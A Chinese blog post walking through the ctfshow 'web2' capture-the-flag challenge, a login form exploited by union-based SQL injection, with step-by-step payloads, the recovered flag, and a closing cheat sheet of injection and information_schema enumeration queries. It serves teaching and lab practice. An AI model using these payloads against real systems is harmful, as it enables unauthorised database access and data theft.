CTF秀web2

最新推荐文章于 2024-04-09 14:15:10 发布
最新推荐文章于 2024-04-09 14:15:10 发布
阅读量931 收藏 3
点赞数 1
分类专栏: CTF 文章标签: 数据库 sql java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53568983/article/details/127913590
版权

CTF秀web2

1.分析题目

在这里插入图片描述

如上图所示,可以看到是sql注入的题目,进入题目看看,题目页面如下:

在这里插入图片描述

如上图所示,有输入框,而且还是登录框,你是怎样登录的了,如下所示:

<?php
$db = new PDO("mysql:host=localhost;dbname='xxx'",用户,密码) 
$stmt = $db->prepare(select password from xxx where username )
$result = $stmt->execult();
$row = $resule->fetchAll(2);
if($password == $row['password'])
....

一般就是根据用户名提取密码,再用密码和你输入的进行比对,如果正确就登录成功,根据用户名提取密码的sql语句一般为select password from xxx where username = 你输入的变量,看这条语句你应该知道可以进行union注入和报错注入

2.解题

你会发现不管输入什么,页面都不会变化,这个时候你可能会去查看源码,源码如下:
在这里插入图片描述
没有action,提交给谁处理数据,tmd,是不是题目错了,我当时就是这样想的,查一下就知道了,没有action交给当前url处理

2.1信息收集

不管输入什么,页面都不会变化,这是因为用户名密码错误,没有从数据库提取到数据回显到页面,让数据库一定会回显就行了,比如select password from xxx where name = xx or 1=1;就一定会回显,所以使用语句1' or 1=1 #

在这里插入图片描述

用户名输入1' or 1=1 #点登录就会回显了,这题你要搞清楚一点sql语句错误和sql语句查不到数据都不会回显,所以order by 测试数据的时候不会回显,直接select 1,2,3测试

在这里插入图片描述

1' union select 1,2,3 #,输出点是第二个
在这里插入图片描述

3.2获取数据库

输入1' union select 1,database(),3 #得到数据库名
在这里插入图片描述

3.3获取数据库表

输入1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='web2') ,3 #获取表名
在这里插入图片描述

3.3获取表信息

有表flag,获取flag信息看看,输入1' union select 1,(select group_concat(column_name) from information_schema.COLUMNS where TABLE_SCHEMA='web2' and TABLE_NAME='flag'),3 #

在这里插入图片描述

有字段flag,获取看看,输入1' union select 1,(select flag from web2.flag limit 0,1),3 #,得到flag如下:

在这里插入图片描述

ctfshow{2dd14bcb-a5fd-439e-ac38-ca994984360c}

3.uinon注入语句

3.1 判断注入
?id=1 and 1=1
?id=1 and 1=2
order by 3
union select 1,2,3
3.2 信息收集
select version(); # 版本
select user(); # 用户
select @@version_compile_os; # 操作系统
select database(); # 数据库
select @@datadir; # 文件路径
3.3注入语句
  • 获取数据库名:
select group_concat(schema_name) from information_schema.SCHEMATA;
  • 获取指定数据库的表
select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='loophole';
  • 获取指定表,指定数据库的列名
select group_concat(column_name) from information_schema.COLUMNS where TABLE_SCHEMA='loophole' and TABLE_NAME='sql_test';
  • 获取数据
select username,address from loophole.sql_test limit 0,1; #注意修改limit获取不同的数据
  • Mysqlinformation_schema.schata数据库
information_schema 自带数据库
information_schema.schemata 数据库
    schema_name
information_schema.tables 数据表
    table_schema    结果是:information_schema
    table_name
information_schema.columns 数据列
    table_schema    结果是:information_schema
    column_name
    table_name
安全天天学
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1802
自用
网络安全CTF ——web_文件包含(2),涨姿势了
最新发布
zhuceyigecsdn的博客
04-09 242
这里URL的意思是:读取index.php的内容,并把输入流进行base64编码,不进行base64编码就如法读取源码,就看不到flag3)写入PHP木马获取webshell,查看Flag这个例子依旧是代码审计的题,注意阅读代码和注释信息为了进一步确定采用哪种思路,需要查看php.ini文件:这里的allow_url_fopen是关闭的,allow_url_include是开启的,则可以尝试使用php://input协议写入木马:指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件自
ctfshow-web2
HAI_WD的博客
07-24 294
知道这里是sql注入,确认一下是什么类型的闭合。可以知道闭合是单引号闭合,然后查一下显示的位数。这道题很多wp,但是为了完整性还是写一下。然后知道库了之后,锁定一下数据表。
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
ctfshow-web2(SQL注入)
Welcome To Myon'Blog !
10-07 415
mysql数据库web2数据库以及其他所有数据库的所有信息都会储存在information_schema这个数据库下,这也是为什么我们可以借助information_schema这个数据库来查询到其他数据库的信息。这里说一下,因为mysql 5.0及其以上的都会自带一个叫information_schema的数据库,相当于是一个已知的数据库,并且该数据库下储存了所有数据库的所以信息。前面我们说过,information_schema这个数据库下面包含了所有数据库的所有信息。成功闭合之后先判断字段数。
ctfshow web入门——web2
m0_74093152的博客
01-28 247
ctfshowweb入门——web2
CTF-show WEB入门--web2
m0_73912575的博客
10-25 204
CTF.show WEB入门--web2 解题write up
ctfshow web2
m0_63253040的博客
03-12 1663
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
CTFshow:WEB2
精神大火的博客
03-21 1439
该题考察SQL注入漏洞,之前对SQL注入仅有部分了解,通过该题进行复习深入。
CTFshow-web-web2
qq_68581192的博客
10-07 145
获取flag表的字段,输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段。获取flag表的数据,1’ union select 1,(select flag from flag),3 # 显示如下。
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF工具之WEB.zip
10-07
该工具包中含有17年永久火狐浏览器,抓包工具,SQL注入工具,webshell,网站后台扫描工具,代码审计系统等
CTF-web学习大纲
01-30
CTF-web学习大纲
ctfshow web入门(2)
2202_75317918的博客
09-21 203
ctfshow web入门(2)
CTFSHOW系列-web2(信息收集-绕过前端js拦截查看源码)
siu~
11-22 434
CTFSHOW系列解题
ctf.show_web2解题过程
qq_38634097的博客
05-24 412
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
ctfshow之web2
夜未至
03-21 263
本人开了一个知识星球,在星球里每天更新网络安全的文章,其中包含在安全中用到的工具和脚本,分享全国职业技能大赛的相关具体细节及解题思路,在星球中有问必答。然后在地址栏回车,就可以查看网页源代码了,获取到flag:ctfshow{42393163-8074-436c-8383-425d3bd989b6}同样也是开发人员忘记了在发布版本去掉那些注释,只不过web2里禁用了右键检查而已,查看源代码的方式还是有很多,总结:前端验证都是不安全的验证。
ctf dumpit web
06-10
我不确定您的问题是什么,但我猜测您可能想问的是:您想了解有关CTF比赛中的Web攻击和Dumpit工具的信息吗? 如果是这样,我可以告诉您,CTF比赛中的Web攻击是指利用Web应用程序中的漏洞来获取敏感信息或者控制服务器的行为。Dumpit是一个用于内存取证的工具,可以从运行中的计算机中提取内存快照,以便进一步进行分析。 如果您有任何具体的问题或者需要更多的帮助,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全天天学

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值